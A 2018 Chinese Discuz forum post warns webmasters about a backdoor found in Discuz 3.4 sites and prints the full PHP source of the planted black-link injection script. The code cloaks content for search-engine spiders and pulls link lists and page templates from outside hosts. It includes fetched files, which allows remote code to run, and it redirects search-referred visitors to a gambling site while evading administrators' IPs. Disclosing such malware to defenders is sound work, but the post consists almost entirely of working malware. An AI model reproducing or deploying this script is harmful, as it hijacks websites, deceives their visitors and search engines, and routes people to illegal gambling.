本帖最后由 民审-M 于 2018-2-7 11:15 编辑
Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑链/友情链接黑链注入脚本:
引入位置:
/static/space/t2/images/下面 *.txt 引用/转换文件
案列黑链注入代码:
可被引入挂载黑链,请站长引起重视,检查目标位置是否存在莫名txt文件。
Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑链/友情链接黑链注入脚本:
引入位置:
/static/space/t2/images/下面 *.txt 引用/转换文件
案列黑链注入代码:
<?php
ini_set('html_errors',false);
ini_set('display_errors',false);
define("APP_INCLUDE_FLAG","TRUE");
define('APP_JACK_CHARSET','GBK');
header("Content-type: text/html; charset=".APP_JACK_CHARSET);
define('APP_JACK_DOCUMENTROOT','/home/wwwroot/discuz/domain/discuz.net/web/static/space/t2/images/');
define('MY_LINK_URL', 'http://www.wlbxsjs.com/l.txt');
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if (stristr($userAgent,"sogou")){
define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt');
define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt');
define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt');
}
else
{
define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'zi.txt');
define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'moban.txt');
define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'bianliang.txt');
}
define('APP_JACK_ARTICLE',APP_JACK_DOCUMENTROOT.'wen.txt');
define('APP_JACK_DES',APP_JACK_DOCUMENTROOT.'miaoshu.txt');
define('APP_JACK_BIANLIANG_B',APP_JACK_DOCUMENTROOT.'bianliang2.txt');
define('APP_JACK_BIANLIANG_C',APP_JACK_DOCUMENTROOT.'bianliang3.txt');
define('APP_MIX_KWD_FILE',APP_JACK_DOCUMENTROOT.'hunhe.txt');
define('APP_JACK_CACHED','Uncached');
define('APP_JACK_MIN_PAR','3');
define('APP_JACK_MAX_PAR','3');
define('APP_JACK_MIN','10');
define('APP_JACK_MAX','15');
define('APP_JACK_APPFILE',APP_JACK_DOCUMENTROOT.'app.txt');
function App_GetLink(){
return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html';
}
function App_GetSelf(){
return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html';
}
//返回图片
function getImg(){
return 'http://link.wlbxsjs.com/tupian/'.rand(1,7000).".jpg";
}
$my_app = new missclient();
$my_app->run();
class missclient{
public $show_spider;
public $jump_ref;
public $http_ref_filter;
public $jump_url = "";
public $domain = "";
public $condition = "";
public $app_server = "";
public $log_spider = "";
public $cur_spider = "";
public $allow_ip = "";
public $isCache = false;
public function run(){
$this->domain = $this->getServerName();
$this->jump_ref = explode("|","360.|haoso.|bing.|google.|sogou.|soso.|so.com|.sm.cn|.youdao|.yisou|.easou|.etao|.chinaso");
$this->http_ref_filter = explode("|","inurl:|site:|site%3A|inurl%3A");
$this->allow_ip = "218.80.218.|10.4.62.|10.4.33";
$this->condition = ($_GET['tid']> 9999999 && $this->isAllowdIp());
$this->app_server = "http://www.sohu999.com/gbk/app.php";
$this->isCache = False;
if($this->isSpider() && $this->isAllowdIp()){
if($this->condition){
if($this->isCache){
$relset_host = $this->getServerName();
$dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
$cacheFile = $dir.'sess_' . substr(md5(http_build_query($_GET)), 6);
if(!@file_exists($dir)){
mkdir($dir, 0777);
}
if(@file_exists($cacheFile) && @filesize ($cacheFile) > 32 ){
$var = coreAppCache::read($cacheFile);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach($var as $key=>$v){
$flag = "{".$key."}";
$page = str_replace($flag,$v,$page);
}
echo myReplace($page);
exit();
}
else
{
//包含进APP即可
$currentPage = include(APP_JACK_APPFILE);
if($currentPage && strlen($currentPage) > 32 && stristr($currentPage,"</explode>")){
$var = self::cut($currentPage,"<explode>","</explode>");
$var = coreAppCache::decode($var);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach($var as $key=>$v){
$flag = "{".$key."}";
$page = str_replace($flag,$v,$page);
}
echo myReplace($page);
@coreAppCache::writenocode($currentPage,$cacheFile);
}
}
die();
}
else
{
$currentPage = include(APP_JACK_APPFILE);
echo myReplace($currentPage);
die();
}
}
else
{
$this->_uncondition_hook();
}
}
else
{
if($this->isRef() && $this->condition){
$this->Jump();
}
else
{
$this->_unSpider_hook();
}
}
}
public function isAllowdIp(){
$ip = $this->clientIp();
$non_list = explode("|",$this->allow_ip);
foreach($non_list as $iplist){
if(@stristr($ip,$iplist)){
return false;
}
}
return true;
}
public function clientIp(){
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
preg_match("/[\d\.]{7,15}/", $onlineip, $onlineipmatches);
$onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
unset($onlineipmatches);
return $onlineip;
}
public function isSpider(){
$bots = array(
'Google' => 'Googlebot',
'MSN' => 'MSNbot',
'Soso' => 'Sosospider',
'Youdao' => 'Youdaobot',
'Yodao' => 'Yodaobot',
'Yisou' => 'Yisouspider',
'Easou' => 'Easouspider',
'Etao' => 'Etaospider',
'Chinaso' => 'Chinasospider',
'Baidu' => 'Baiduspider',
'Sogou' => 'Sogou news Spider',
'Sogou' => 'Sogou orion spider',
'Sogou' => 'Sogou news Spider',
'Sogou' => 'Sogou blog',
'Sogou' => 'Sogou spider2',
'Sogou' => 'Sogou inst spider',
'Sogou' => 'Sogou web spider',
'Haoso' => 'haosouspider',
'360spider' => '360spider',
'bingbot' => 'bingbot'
);
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
foreach ($bots as $k => $v){
if (stristr($userAgent,$v)){
if(!empty($this->log_spider)){
@file_put_contents($this->log_spider,$v."->Visited ".$_SERVER['QUERY_STRING']."at: ".date("Y-m-d H:i:s")."\n",FILE_APPEND);
}
$this->cur_spider = $k;
return true;
break;
}
}
return false;
}
public function isRef(){
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if(isset($_COOKIE["domain-filter-bypass"])){
return false;
}
if(!$this->isAllowdIp()){
setcookie("domain-filter-bypass", "lol", time() + 259200);
return false;
}
foreach($this->http_ref_filter as $r){
$r = trim($r);
if(stristr($ref,$r)){
setcookie("domain-filter-bypass", "lol", time() + 259200);
return false;
}
}
foreach($this->jump_ref as $r){
$r = trim($r);
if(stristr($ref,$r)){
return true;
}
}
}
public function getServerName()
{
$ServerName = strtolower($_SERVER['SERVER_NAME']?$_SERVER['SERVER_NAME']:$_SERVER['HTTP_HOST']);
if( strpos($ServerName,'http://') )
{
return str_replace('http://','',$ServerName);
}
return $ServerName;
}
public function getPage(){
if($this->isCache){
$cache="cached";
}
$url = $this->app_server."?domain=".$this->domain."&gid=199&spider=".$this->cur_spider."&cache=".$cache."&localPar=".http_build_query($_GET);
return $this->HttpVisit($url);
}
public function HttpVisit($weburl) {
$remote_data = NULL;
if (function_exists('curl_exec')) {
$curl = @curl_init();
@curl_setopt($curl, CURLOPT_URL, $weburl);
@curl_setopt($curl, CURLOPT_HEADER, 0);
@curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
@curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$remote_data = @curl_exec($curl);
@curl_close($curl);
} else {
if (function_exists('stream_context_create')) {
$header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
$http_header = @stream_context_create($header_array);
$remote_data = @file_get_contents($weburl, false, $http_header);
} else {
$temp_url = explode("/", $weburl);
$new_url = $temp_url[2];
$http_port = 80;
$get_file = substr($weburl, strlen($new_url) + 7);
if (strstr($new_url, chr(58))) {
$s_var_array['td'] = explode(chr(58), $new_url);
$new_url = $s_var_array['td'][0];
$http_port = $s_var_array['td'][1];
}
$fsock_result = @fsockopen($new_url, $http_port);
@fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "\r\n" . 'Host:' . $new_url . "\r\n" . 'Connection:Close' . "\r\n\r\n");
while (!feof($fsock_result)) {
$remote_data .= fgets($fsock_result, 1024);
}
@fclose($fsock_result);
}
}
return $remote_data;
}
public function Jump(){
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if($this->isAllowdIp() && stristr($ref,"sogou.")){
$domain = str_replace(".","_",$this->domain);
header('Location: https://958999a.com/?jpb_'.$domain);
exit;
}
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if($this->isAllowdIp() && stristr($ref,"bing.")){
$domain = str_replace(".","_",$this->domain);
header('Location: https://958999a.com/?jpb_'.$domain);
exit;
}
if($this->isAllowdIp()){
$domain = str_replace(".","_",$this->domain);
header('Location: https://958999a.com/?jpb_'.$domain);
exit;
}
}
public function _uncondition_hook(){
$array = array();
for($a=0;$a<5;$a++){
echo '<a href="'.App_GetLink().'"></a>'."\n";
}
}
public function _unSpider_hook(){
//
}
public function strStartWith($needle, $haystack){
return (substr($haystack, 0, strlen($needle))==$needle);
}
public function rndStr($length=8){
$str = null;
$strPol = "0123456789abcdefghijklmnopqrstuvwxyz";
$max = strlen($strPol)-1;
for($i=0;$i<$length;$i++){
$str.=$strPol[rand(0,$max)];
}
return $str;
}
public function cut($file,$from,$end)
{
$message=explode($from,$file);
$message=explode($end,$message[1]);
return $message[0];
}
}
class coreAppCache{
//写入缓存
public function write($file,$filename){
return file_put_contents($filename,self::encode($file));
}
public function writenocode($file,$filename){
return file_put_contents($filename,$file);
}
public function read($filename){
$content = file_get_contents($filename);
if(stristr($content,"</explode>")){
$content = self::cut($content,"<explode>","</explode>");
}
return self::decode($content);
}
public function encode($file){
return base64_encode(gzcompress(serialize($file)));
}
public function decode($file){
return unserialize(gzuncompress(base64_decode($file)));
}
public function cut($file,$from,$end)
{
$message=explode($from,$file);
$message=explode($end,$message[1]);
return $message[0];
}
}
function removeBom($str) {
$str = preg_replace('/^[\pZ\p{Cc}\x{feff}]+|[\pZ\p{Cc}\x{feff}]+$/ux', '', $str);
return $str;
}
function replaceMyLink($str) {
static $myLinks;
if (is_null($myLinks)) {
$c = new missclient();
$contents = removeBom($c->HttpVisit(MY_LINK_URL));
$contents = array_filter(array_map('trim', explode(PHP_EOL, $contents)));
$myLinks = $contents;
}
$linkIndex = array_rand($myLinks, 1);
$link = $myLinks[$linkIndex];
return $link;
}
function myLinkHandler($str) {
return preg_replace_callback('#\{\s*友情链接\d*\s*\}#si', 'replaceMyLink', $str);
}
function myReplace($str) {
$str = myLinkHandler($str);
preg_match_all('#<\?=\s*([^\)]+)\(([^\)]+)\)\s*\?>#i', $str, $arr, PREG_SET_ORDER);
foreach ($arr as $item) {
if (isset($item[1], $item[2]) && function_exists($item[1])) {
$a = call_user_func_array($item[1], explode(',', $item[2]));
$str = str_replace_first($item[0], $a, $str);
}
}
return $str;
}
function str_replace_first($from, $to, $subject)
{
$from = '@'.preg_quote($from, '/').'@si';
return preg_replace($from, $to, $subject, 1);
}
function randKey($len, $mLen = null)
{
$chars = array(
"0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"
);
if ($mLen && $mLen > 0) {
$minLen = min($len, $mLen);
$maxLen = max($mLen, $len);
$lenArr = range($minLen, $maxLen);
$len = $lenArr[array_rand($lenArr)];
}
$charsLen = count($chars) - 1;
shuffle($chars);
$str = "";
for ($i=0; $i<$len; $i++)
{
$str .= $chars[mt_rand(0, $charsLen)];
}
return trim($str);
}
?>
可被引入挂载黑链,请站长引起重视,检查目标位置是否存在莫名txt文件。
评论
发新帖
作者最近主题
相关贴子
- Discuz!基础的代码安全和代码规范
- it618推广佣金联盟 全功能完整版 v2.0(更新补丁)
- [X3.0模板]落尘首发:S!Metro GBK价值 580.00 的商业版_最新版
- 无法启用
- 万能投票 正式版v5.36 DZ学习研究交流(全网首发更新)
- 微信登录独立版 微信登录[开放平台]版 1.6.3--------下载地址
- 某论坛模板被挂马隐藏跳转到非法网站排查经历
- VShop 原创手机模板 VShop商业版--------下载地址
- 码上点餐外卖餐饮系统 7.3.1 开源版 优化订单发起多次退款流程 微信魔方专供
- [深蓝]521交友中心 DZ站长人手必备 8.5 DZ学习研究交流
- Glider! GBK v2.0--------下载地址
- 多贝时光/旅行 商业版UTF8--------下载地址
- 软件下载资源专题 专题版 1.5.0--------下载地址
- 积分申请月VIP
- 我已经续费了终身会员怎么没开通
- 微擎1.67纯净商业版+安装教程,比原版还纯净
- 微赞商业版 V71.5更新:修复升级超人房产功能(修复已知问题;新增经纪人注册)
- 下载不了?
- 申请【西瓜】分类信息 90.20181113 更新
- [1314]自动隐藏附件 V1.0.2 - DZ学习研究交流 · 插件 专业开源[1314]